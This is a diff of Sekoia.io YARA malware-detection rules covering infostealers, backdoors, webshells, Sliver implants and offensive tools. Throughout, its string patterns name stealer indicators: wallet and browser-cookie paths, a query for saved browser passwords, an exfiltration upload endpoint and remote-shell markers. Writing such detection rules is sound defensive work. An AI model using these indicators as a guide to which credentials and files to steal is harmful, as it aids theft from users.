+		$str02 = "*main.StealerData" ascii
+		$str03 = "AppData\\Roaming\\Armory" ascii
+		$str04 = "AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" ascii
+		$str05 = "github.com/TheTitanrain/w32" ascii
+		$str06 = "github.com/mattn/go-sqlite3" ascii
+		$str07 = "ScreenShot" ascii
+		$str08 = "*sql.stmtConnGrabber" ascii
+		$str09 = "Default\\Network\\Cookies" ascii
+		$str10 = "BuildID" ascii
+		$str11 = "Clipper" ascii
+		$str12 = "GeoPos" ascii
+		$str13 = "AppData\\Roaming\\Exodus\\exodus.wallet" ascii
+		$str14 = "FileGrabber\\Documents" ascii
+		$str15 = "193.233.48." ascii
+		$str16 = "ShellExecute" ascii
+		$str17 = "crypto/aes.(*aesCipherGCM).Encrypt" ascii
+		$str18 = "File-Download" ascii
 
 	condition:
-		9 of them
+		uint16( 0 ) == 0x5A4D and ( 14 of them or pe.imphash ( ) == "8ee5c1c09f740fbe63e8b35dac5d6f70" or pe.imphash ( ) == "369b4f5b6c99674f15070689e1f675af" )
 }
-rule SEKOIA_Downloader_Win_Search : FILE
+rule SEKOIA_Implant_Any_Sliver_Not_Stripped : FILE
 {
 	meta:
-		description = "'Search.exe' script used by APT42"
+		description = "Rule which detects non stripped Sliver PE/Dlls/ELFs/MAC-O."
 		author = "Sekoia.io"
-		id = "8094ddda-6294-4dee-93cb-de79aaed1ec6"
-		date = "2024-08-23"
+		id = "35543c7c-c39b-4f96-b37c-1d27736e40fc"
+		date = "2021-11-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_win_search.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_any_sliver_not_stripped.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "a29fa85ecfc0e5554c21f3b9db185de97b3504517403f4aa102adbd2c46dc1bf"
-		hash = "f83e2b3be2e6db20806a4b9b216edc7508fa81ce60bf59436d53d3ae435b6060"
-		logic_hash = "1b25f04d1d2c9b7bdc7e0bd17d2f2876c27f9c4acb3a2afca6a4df531e769740"
+		logic_hash = "5240f3ea1fb421697eeb12eb17d0b31c036b53f39c3a590473d87065b5d28e3e"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.0"
+		modification_date = "2021-12-22"
+		version = "1.1"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "C:\\Users\\pc\\source\\repos\\Search\\Search\\obj\\Debug\\Search.pdb"
+		$a1 = "github.com/bishopfox/sliver/implant/sliver/"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		( uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xcffaedfe ) and filesize < 11MB and filesize > 8MB and #a1 > 200
 }
-rule SEKOIA_Infostealer_Win_Doenerium_Str : FILE
+rule SEKOIA_Tool_Pivotnacci
 {
 	meta:
-		description = "Detect the Doenerium infostealer based on specific strings"
+		description = "Detects Pivotnacci"
 		author = "Sekoia.io"
-		id = "1645a86f-1063-4e98-a1fa-85fc8c4e9691"
-		date = "2022-09-29"
+		id = "31ecb08a-fc92-4cbe-a865-7ce869a5fa6a"
+		date = "2024-04-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_doenerium_str.yar#L1-L29"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_pivotnacci.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9bc28d89ad2654c33f2ecd9736f5fb3a10dfc68dfef44ece6e628f5bb8db0800"
+		logic_hash = "b0e4bc997775fb5ff258a23e07a58b4897a2ce9d3fffab86e93919857e566d18"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "doenerium" ascii
-		$str02 = "<================[   User Info   ]>================>" ascii
-		$str03 = "<================[WiFi connections]>================>" ascii
-		$str04 = "<================[Executable Info]>================>" ascii
-		$str05 = "<================[ Network Data ]>================>" ascii
-		$str06 = "\\Network Data.txt" ascii
-		$str07 = "\\Update.exe\" --processStart" ascii
-		$str09 = "\\WiFi Connections.txt" ascii
-		$str10 = "\\User Info.txt" ascii
-		$str11 = "\\Executable Info.txt" ascii
-		$str12 = "\\Found Wallets.txt" ascii
-		$str13 = "SELECT origin_url, username_value, password_value FROM logins" ascii
-		$str14 = "https://cdn.discordapp.com/embed/avatars/0.png" ascii
-		$str15 = "detectClipboard" ascii
-		$str16 = ".gofile.io/uploadFile" ascii
+		$pivotnacci = "pivotnacci"
+		$s1 = "Socks server => %s:%s"
+		$s2 = "The default listening address"
+		$s3 = "Socks server for HTTP agents"
+		$s4 = "Message returned by the agent web page"
+		$s5 = "Password to communicate with the agent"
+		$s6 = "To specify agent type in case is not automatically detected."
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 6 of them
+		$pivotnacci and 3 of ( $s* )
 }
-rule SEKOIA_Hacktool_Pplblade_Strings : FILE
+rule SEKOIA_Tool_Printnotifypotato : FILE
 {
 	meta:
-		description = "Detects PPLBlade"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "1a443621-fc95-4a70-873e-c1389943d4ab"
-		date = "2023-11-23"
+		id = "8dde175f-025a-4c27-bcc6-d0016dd7238c"
+		date = "2023-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_pplblade_strings.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_printnotifypotato.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e853e109dbf5dfcba465f61cb689f261df5156e98297d3d00f700e20491de66e"
+		logic_hash = "5d4b7d1582c2b3f53ca5e1ff6e7ff97a677fe8870e94415f7328ea0a0387049c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -252479,76 +252454,104 @@ rule SEKOIA_Hacktool_Pplblade_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "shirou/gopsutil/internal/"
-		$ = ".miniDumpWriteDump"
-		$ = ".DRIVER_FULL_PATH"
+		$s1 = "PrintNotifyPotato.exe" ascii wide
+		$s2 = "BeichenDream" ascii wide
+		$s3 = "interactive" ascii wide
+		$s4 = "DuplicateTokenEx" ascii wide
+		$s5 = "CurrentUser" ascii wide
+		$s6 = "FakeIUnknown" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 4MB and filesize < 6MB and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and all of them
 }
-rule SEKOIA_Rat_Win_Lilith
+rule SEKOIA_Infostealer_Win_Aurora : FILE
 {
 	meta:
-		description = "Detect the Lilith malware"
+		description = "Finds Aurora samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "944637e6-c4e4-423f-9f4c-a26b4fce3729"
-		date = "2023-02-23"
+		id = "22ae81b4-647f-4b46-9b2a-dd96e0615d65"
+		date = "2022-11-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_lilith.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_aurora.yar#L1-L35"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ac2ad9e68616e6e7d07e105293545c96b72c956dbcf3c3bf317460cafc13be48"
+		logic_hash = "e88cbb012ffb65aa8a70b76163a834c0bc4615b0effc93945c6d915e33c04549"
 		score = 75
-		quality = 76
-		tags = ""
+		quality = 78
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = {55 6d 56 6e 55 58 56 6c 63 6e 6c 57 59 57 78 31 5a 55 56 34 51 51 3d 3d}
-		$ = {67 65 74 61 64 64 72 69 6e 66 6f 3a 20 25 73}
+		$str00 = "I'm a teapot" ascii
+		$str01 = "wmic cpu get name" ascii
+		$str02 = "wmic path win32_VideoController get" ascii
+		$str03 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones" ascii
+		$str04 = "Exodus\\exodus.wallet" ascii
+		$str05 = "PaliWallet" ascii
+		$str06 = "cookies.sqlite" ascii
+		$str07 = "Startup\\Documents\\User Data" ascii
+		$str08 = "atomic\\Local Storage\\leveldb" ascii
+		$str09 = "com.liberty.jaxx\\IndexedDB" ascii
+		$str10 = "Guarda\\Local Storage\\leveldb" ascii
+		$str11 = "AppData\\Roaming\\Telegram Desktop\\tdata" ascii
+		$str12 = "Ethereum\\keystore" ascii
+		$str13 = "Coin98" ascii
+		$str14 = ".bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.xml.zip" ascii
+		$str15 = "type..eq.main.Grabber" ascii
+		$str16 = "type..eq.main.Loader_A" ascii
+		$str17 = "type..eq.net/http.socksUsernamePassword" ascii
+		$str18 = "powershell" ascii
+		$str19 = "start-process" ascii
+		$str20 = "http/httpproxy" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and 15 of them and filesize > 4MB
 }
-rule SEKOIA_Apt_Apt28_Htmlsmuggling_Disclosing_Ip : FILE
+rule SEKOIA_Backdoor_Win_Sponsor : FILE
 {
 	meta:
-		description = "Detects some kind of HTMLSmuggling used by APT28"
+		description = "Detect the Sponsor backdoor"
 		author = "Sekoia.io"
-		id = "57adc227-2b72-457e-a786-97ca1a7300d8"
-		date = "2023-09-11"
+		id = "d410cdb7-a2a8-481e-a90a-49ef15a7a0e3"
+		date = "2024-03-29"
 		modified = "2024-12-19"
-		reference = "https://www.zscaler.com/blogs/security-research/steal-it-campaign"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt28_htmlsmuggling_disclosing_ip.yar#L1-L18"
+		reference = "https://www.welivesecurity.com/en/eset-research/sponsor-batch-filed-whiskers-ballistic-bobcats-scan-strike-backdoor/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_sponsor.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "047d2d5f8d04576b6d57bc599f82406804845a3acb7628e7ad9b56e71e4dfe92"
+		logic_hash = "844104863e8e0c49da3a41d39fe210e01329eeaecec6ffc231aae12392773ef6"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "e5ee874bd59bb2a6dec700686544e7914312abff166a7390b34f7cb29993267a"
+		hash2 = "e2b74ed355d68bed2e7242baecccd7eb6eb480212d6cc54526bc4ff7e6f57629"
+		hash3 = "2a99cf7d73d453f3554e24bf3efa49d8109da9e8543db815a8f813559d083f8f"
+		hash4 = "c4dbda41c726af9ba3d9224f2e38fc433d2b60f4a23512437adeae8ef8986c57"
 
 	strings:
-		$s1 = "ipapi.co/json"
-		$s2 = "a.download("
-		$s3 = "a.click("
+		$ = "Content-Type: application/x-www-form-urlencoded"
+		$ = "SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation"
+		$ = "\\Uninstall.bat"
+		$ = "\\config.txt"
+		$ = "\\node.txt"
 
 	condition:
-		$s1 and $s2 and $s3 and filesize < 5000
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Apt_Gamaredon_Lnks_Farl139_Hostname : FILE
+rule SEKOIA_Trojan_Win_Grandoreiro : FILE
 {
 	meta:
-		description = "Detects some hostname used in Gamaredon LNKs"
+		description = "Finds Grandorerio samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "f8bb2e6b-e544-46b0-b61b-048fe84e1100"
-		date = "2023-01-20"
+		id = "e48c86a1-e34f-4945-817a-9c85198a77bb"
+		date = "2022-08-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_lnks_farl139_hostname.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/trojan_win_grandoreiro.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8be31a4fed363f0e2791efb96a229f6cdec5bfaeaf3e9cd880f8d25c9ae0435e"
+		logic_hash = "7424478b0cdfe922c2f98bf42e505f22fb0700cfeb54912630ce404c59b05c5e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -252556,59 +252559,65 @@ rule SEKOIA_Apt_Gamaredon_Lnks_Farl139_Hostname : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "desktop-farl139"
+		$mut = "ZTP@11" wide
+		$reg01 = "Software\\Embarcadero\\Locales" wide
+		$reg02 = "Software\\CodeGear\\Locales" wide
+		$reg03 = "Software\\Borland\\Locales" wide
+		$reg04 = "Software\\Borland\\Delphi\\Locale" wide
+		$reg05 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" wide
+		$str01 = "SELECT * FROM AntiVirusProduct" wide
+		$str02 = "GetTickCount64" wide
+		$str03 = "C:\\Program Files (x86)\\Embarcadero\\Studio\\20.0\\lib\\Clever Internet Suite" wide
+		$str04 = "{43826D1E-E718-42EE-BC55-A1E261C37BFE}" wide
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and all of them and filesize < 10KB
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Apt_Polonium_Megacreep_Strings : FILE
+rule SEKOIA_Tool_Sharphoundexecutable_Strings : FILE
 {
 	meta:
-		description = "Tries to detect POLONIUM's MegaCreep implant"
+		description = "Detects the SharpHound tool"
 		author = "Sekoia.io"
-		id = "4d62d5bc-2ec9-58ef-bfe7-c0b04fa73b6f"
-		date = "2022-10-12"
+		id = "2cf8046e-5b4d-4ff7-b4b2-7aaeaf58883b"
+		date = "2022-08-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_polonium_megacreep_strings.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_sharphoundexecutable_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f4881e15854b082d8e6b8a28a7eb1518c559577b1b3ce76e404d67b1fe723fde"
+		logic_hash = "1b28a2b9dd594f344a1a2a74fd9b30527a66dabb451b21afca40a0e6ec8d3553"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		orig_id = "927c5fd6-0574-43bf-8db9-6ecc328estrin56c7"
 
 	strings:
-		$ = "[#!#]" ascii wide
-		$ = "[$$%$$]" ascii wide
-		$ = ".e##x##e" ascii wide
-		$ = "WHLib.dll" ascii wide
-		$ = "TestService.txt" ascii wide
-		$ = "X = Stop" ascii wide
-		$ = "Sess.dll" ascii wide
-		$ = "filepathOnTarget" ascii wide
-		$ = "FileNameOnMega" ascii wide
-		$ = "Missing Parameter.. Format of command:" ascii wide
-		$ = "Your Old K##E##Y is Wronge" ascii wide
-		$ = "Your Upgrage Is Success" ascii wide
+		$ = "BloodHoundLoopResults.zip" wide
+		$ = "[-] Removed PSRemote Collection" wide
+		$ = "Initializing SharpHound at {time} on {date}" wide
+		$ = "[SearchForest] Cross-domain enumeration may result in reduced data quality" wide
+		$ = "SharpHound Enumeration Completed at {Time} on {Date}! Happy Graphing!" wide
+		$ = "Consumer task on thread {id} completed" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 2MB and 3 of them
+		uint16be( 0 ) == 0x4d5a and 3 of them
 }
-rule SEKOIA_Apt_Luckymouse_Rshell_Strings_All_Platform : FILE
+rule SEKOIA_Malware_Tinyshell_Strings : FILE
 {
 	meta:
-		description = "Detects LuckyMouse RShell Mach-O implant"
+		description = "Detects TinyShell based on strings"
 		author = "Sekoia.io"
-		id = "e79a5ee1-96b3-4643-ab11-0b1095e96488"
-		date = "2022-08-05"
+		id = "51fe9986-cb33-4802-bb8d-fe3d4cdfdcc8"
+		date = "2024-09-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_luckymouse_rshell_strings_all_platform.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_tinyshell_strings.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ef923b6633a2b7dfa645a31c7c2d0e00872ebad6ec7748568c2b306c29b6b29b"
+		hash = "fffc89ebbe6ea37072077996e27f86dd"
+		hash = "59a97d4fbd3a54e991dc7e1f0451acf5"
+		hash = "d7ee59eab7f703bfaf1002a39b05c7b9"
+		hash = "3f2dfe47d4563919d889132b2759fd9c"
+		logic_hash = "18d10e7e6f0ba8a9ea7fa8446a930f84ce5eb2f3a022ce3dc62bc3f8fd5699e1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -252616,27 +252625,28 @@ rule SEKOIA_Apt_Luckymouse_Rshell_Strings_All_Platform : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { 6C 6F 67 69 6E 00 68 6F
-        73 74 6E 61 6D 65 00 6C
-        61 6E 00 75 73 65 72 6E
-        61 6D 65 00 76 65 72 73
-        69 6F 6E }
+		$ = "_tsh_get_file"
+		$ = "_tsh_put_file"
+		$ = "_tsh_runshell"
+		$ = "Authentication failed."
+		$ = "pel_send_msg"
+		$ = "exec bash --login"
 
 	condition:
-		filesize < 1MB and all of them
+		3 of them and filesize < 150KB
 }
-rule SEKOIA_Tool_Dynamicwrapper_Strings : FILE
+rule SEKOIA_Apt_Gobrat_2 : FILE
 {
 	meta:
-		description = "Detects DynamicWrapperX"
+		description = "Detects GobRat related files"
 		author = "Sekoia.io"
-		id = "bbfad0a8-8b86-47c7-bf70-0a3f6859d64b"
-		date = "2023-12-01"
+		id = "6b7e38f5-00bc-49c8-b34d-3e878bf426d8"
+		date = "2024-09-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_dynamicwrapper_strings.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gobrat_2.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "fad5fec74dc3efdd7fc67ef1c6373957df4ee564f3fe6333b924b236ea7458d9"
+		logic_hash = "9f2fdbe2cc39c91b2ac8904fb29a0142bf770859d17590017920203641860a13"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -252644,59 +252654,53 @@ rule SEKOIA_Tool_Dynamicwrapper_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Software\\Classes\\DynamicWrapperX" ascii
-		$ = "DllRegisterServer" ascii
-		$ = "GoLink, GoAsm" ascii
+		$ = "thisisweird" ascii
+		$ = "ZzZzZzZzZzZz"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 100KB and all of them
+		all of them and uint32be( 0 ) == 0x7f454c46
 }
-rule SEKOIA_Ransomware_Win_Raworld
+rule SEKOIA_Apt_Apt_K_47_Walkershell : FILE
 {
 	meta:
-		description = "Detects files related to stage 1 of a campaign from the ransomware group RA World."
+		description = "Detects WalkerShell used by APT-K-47"
 		author = "Sekoia.io"
-		id = "a9ed9c5a-7a0e-4c2e-90f4-d52f5589b2b8"
-		date = "2024-07-24"
+		id = "201f8415-32d4-4af1-ba80-734554ced728"
+		date = "2024-02-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_raworld.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt_k_47_walkershell.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "583dd2ea8e20a87d0b67783d1dd59212eb133de1f945d5b4afad89e8a5017d35"
+		logic_hash = "0dffd8e4d6c244a4faea0f8b8cda1e544a732ad9982e7963b21d5f71080f8f5d"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "Loder.exe" ascii fullword
-		$s2 = "Stage2.exe" wide
-		$s3 = "SYSVOL" wide
-		$s4 = "Finish.exe" wide
-		$s5 = "Exclude.exe" wide
-		$s6 = "Stage3.exe" wide
-		$s7 = "Pay.txt" ascii fullword
-		$s8 = "RA World" ascii fullword
-		$s9 = "Stage1.exe" ascii fullword
+		$s1 = "\\n kuskure" ascii wide
+		$s2 = "col.log.txt" ascii wide
+		$s3 = "polor" ascii wide
+		$s4 = "emit" ascii wide
+		$s5 = "delta" ascii wide
+		$s6 = "under process" ascii wide
 
 	condition:
-		4 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 4MB and all of them
 }
-
-rule SEKOIA_Implant_Win_Incontroller : FILE
+rule SEKOIA_Luckymouse_Sysupdate_Loader : FILE
 {
 	meta:
-		description = "Detect the INCONTROLLER implant "
+		description = "Detects decryption routine prologue of sysupdate loader"
 		author = "Sekoia.io"
-		id = "c346c6ea-c5c0-4e9f-a632-1e8ed0286fbc"
-		date = "2022-04-14"
+		id = "6007e846-d467-4d07-b345-e25191b7c8bc"
+		date = "2022-08-19"
 		modified = "2024-12-19"
-		reference = "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_incontroller.yar#L4-L49"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/luckymouse_sysupdate_loader.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "69296ca3575d9bc04ce0250d734d1a83c1348f5b6da756944933af0578bd41d2"
-		logic_hash = "988e3004169817758a38dc7cd621ed351dac4de41e6dad03ab1cdfc07b8a6cac"
+		logic_hash = "9d46b74d8e5f94ecd844cffcd6d0d29eb662374c1d6fbe87acf3c877e5f963b3"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -252704,34 +252708,23 @@ rule SEKOIA_Implant_Win_Incontroller : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "AsRockDrv.sys" ascii
-		$ = "C:\\Users\\User1\\Desktop\\dev projects\\SignSploit1\\x64\\Release\\AsrDrv_exploit.pdb" ascii
-		$ = "found map in %.3f sec physical address : %016I64x" ascii
-		$ = "get physical regions error : %x!"
-		$ = "Device AsrDrv103 was opened successefuly!" ascii
-		$ = "Ioctl handler AsrDrv103 was found successefuly!" ascii
-		$ = "cant open the AsrDrv103!" ascii
-		$ = "can't read a unsigned driver ! " ascii
-		$ = "cant drop and load exploatable driver ! " ascii
-		$ = "please set unsigned driver as argument to program!" ascii
-		$ = "\\DosDevices\\AsrDrv103" wide
-		$t = "This program cannot be run in DOS mode."
+		$s1 = { DB D4 33 C9 66 B9 ?? ?? E8 FF FF FF FF }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and 4 of them and filesize < 800KB and #t == 2 ) or pe.imphash ( ) == "f139e860bc959a7e65a008399425c090" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "a2fe4d32d74354c391a283178f0291e6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "c33f9caa68fe46c6996a928ba5a38fd6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d9a1f1a4d48906da1d9f33eae0f0eaef" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "76426b0209a87fa32ca28e9f2361be67" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "9e63a5064b755925598b8d72ace52dc9" ) or hash.md5 ( pe.rich_signature.clear_data ) == "140d7fb360dbebb03edab903b5d08285"
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Emberbear_Credpump_Strings : FILE
+rule SEKOIA_Apt_Oilrig_Sc5Kv3_Strings : FILE
 {
 	meta:
-		description = "Detects CredPump backdoor"
+		description = "Detects SC5kv3 malware based on strings"
 		author = "Sekoia.io"
-		id = "c9898e34-4ab8-49d6-9c8a-3fce592449e2"
-		date = "2023-02-28"
+		id = "885ea13b-47b0-4a6d-8136-9b31abc9064a"
+		date = "2023-12-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_emberbear_credpump_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_sc5kv3_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6f2c96fe3f314221626b4c053658af0e7231f151886f10eb1d69e07ea3e5c634"
+		logic_hash = "ace8e227abd97d0ec21815cc58c24d46e4944f2b0e1987672be53f81356a7a57"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -252739,30 +252732,24 @@ rule SEKOIA_Apt_Emberbear_Credpump_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "User=%s Pass=%s Host=%s"
-		$ = "/etc/rc0.d/.rc0.d"
-		$ = "pam_get_authtok"
-		$ = "Password:"
+		$ = "no-reply this email!" ascii wide
+		$ = "The serial is " ascii wide
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 200KB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 5MB and all of them
 }
-rule SEKOIA_Webshell_Icesword_Strings : FILE
+rule SEKOIA_Generic_Bat_Script_Mock_Http_Services : FILE
 {
 	meta:
-		description = "Detects icesword webshell"
+		description = "Generic rule detecting BAT script using mock HTTP services (used by APT28)"
 		author = "Sekoia.io"
-		id = "2c6b3cec-4200-4386-8cd5-4004c9b5b96a"
-		date = "2024-11-22"
+		id = "1cfbe5ba-6304-476d-8308-928100a85c16"
+		date = "2023-09-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/webshell_icesword_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_bat_script_mock_http_services.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "0447352827e61696304a8e3d34e1d270"
-		hash = "f49cfcda0abdefa385eda7ec7e7a5411"
-		hash = "e1518388375ba772ed20503ec6dc6c8a"
-		hash = "ecf08cd6af127e01f913354529174a23"
-		logic_hash = "25ea8c1f4756595e63f09dfdfd1cb0e9bbf1d05e46150e22993de95d9f758385"
+		logic_hash = "d34be59cfb054895381580e7852bba6b899cfb680882b7fd24a72438131c3bee"
